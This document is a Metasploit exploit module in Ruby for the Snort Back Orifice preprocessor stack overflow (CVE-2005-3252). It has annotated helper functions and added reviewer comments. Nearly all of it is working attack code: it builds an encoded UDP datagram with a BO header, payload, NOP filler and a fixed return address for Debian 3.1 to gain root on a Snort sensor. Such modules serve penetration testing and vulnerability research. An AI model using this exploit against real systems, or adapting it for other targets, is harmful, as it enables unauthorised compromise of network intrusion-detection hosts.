##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
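class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Module metadata: the vulnerable component, affected versions, references,
  # payload constraints and the single Linux target with its fixed return address.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Snort Back Orifice Pre-Preprocessor Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the Back Orifice pre-processor module
        included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
        be used to completely compromise a Snort sensor, and would typically gain an attacker
        full root or administrative privileges.
      },
      'Author'         => 'KaiJern Lau <xwings[at]mysec.org>',
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-3252'],
          ['OSVDB', '20034'],
          ['BID', '15131']
        ],
      'Payload'        =>
        {
          # NOTE(review): 'Space' exceeds the 1069-byte offset used by #exploit once the
          # 17-byte BO header is subtracted (1069 - 17 = 1052); a payload that fills the
          # whole space would make the make_nops count negative. Confirm the intended limit.
          'Space'    => 1073, #ret : 1069
          'BadChars' => "\x00",
        },
      'Platform'       => %w{ linux },
      'Targets'        =>
        [
          # Target 0: Debian 3.1 Sarge
          [
            'Debian 3.1 Sarge',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbffff350
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2005-10-18'))

    # Configure the default port to be 9080
    register_options(
      [
        Opt::RPORT(9080),
      ])
  end

  # Reset the key-stream generator used by #bocrypt.
  #
  # @param seed [Integer] accepted for symmetry with the C srand() this mirrors, but
  #   ignored: the generator state is always set to 31337, the fixed value the Back
  #   Orifice pre-processor expects when no password is configured. #bocrypt passes 0
  #   and relies on this behaviour, so do not honour the argument without checking it.
  # @return [Integer] the new generator state
  def msrand(seed)
    @holdrand = 31337
  end

  # Advance the generator and return the next 15-bit key-stream value.
  #
  # The multiplier/increment pair 214013 / 2531011 is the linear congruential
  # generator of the Microsoft C runtime's rand(), which is what the pre-processor
  # reproduces. The state is reduced modulo 2**32 like the C unsigned int it models;
  # the returned bits (16..30) are not affected by this, since the low 31 bits of a
  # product/sum never depend on higher bits, so output is identical to the unmasked
  # form while the state no longer grows into an ever-larger bignum.
  #
  # @return [Integer] value in 0..0x7fff
  def mrand
    @holdrand = (@holdrand * 214013 + 2531011) & 0xffffffff
    (@holdrand >> 16) & 0x7fff
  end

  # XOR-encode a buffer with the Back Orifice key stream.
  #
  # Each byte of +takepayload+ is XORed with the low byte of successive #mrand values,
  # starting from the fixed 31337 state set by #msrand. Operating on bytes (rather than
  # splitting into characters) keeps the transform correct for binary input regardless
  # of the string's encoding.
  #
  # @param takepayload [String] plaintext bytes
  # @return [String] encoded bytes, same length as the input, binary encoding
  def bocrypt(takepayload)
    msrand(0)
    encoded = ''.b
    takepayload.each_byte do |byte|
      encoded << (byte ^ (mrand % 256)).chr
    end
    encoded
  end

  # Send the single encoded UDP datagram and hand off to the payload handler.
  #
  # Layout: BO header (magic, declared length, ID, PING opcode), encoded payload,
  # NOP filler up to the 1069-byte offset, then the target return address.
  def exploit
    connect_udp

    boheader =
      "*!*QWTY?" +
      [1096].pack("V") +   # Length ,thanx Russell Sanford
      "\xed\xac\xef\x0d" + # ID
      "\x01"               # PING

    # Encode once and reuse: the original evaluated payload.encode twice (for the
    # filler length and for the datagram), so a non-byte-stable encoder could have
    # produced a datagram whose return-address offset did not match the filler.
    encoded_payload = payload.encode

    filler =
      make_nops(1069 - (boheader.length + encoded_payload.length))

    udp_sock.write(
      bocrypt(boheader + encoded_payload + filler + [target.ret].pack('V'))
    )

    handler
    disconnect_udp
  end
end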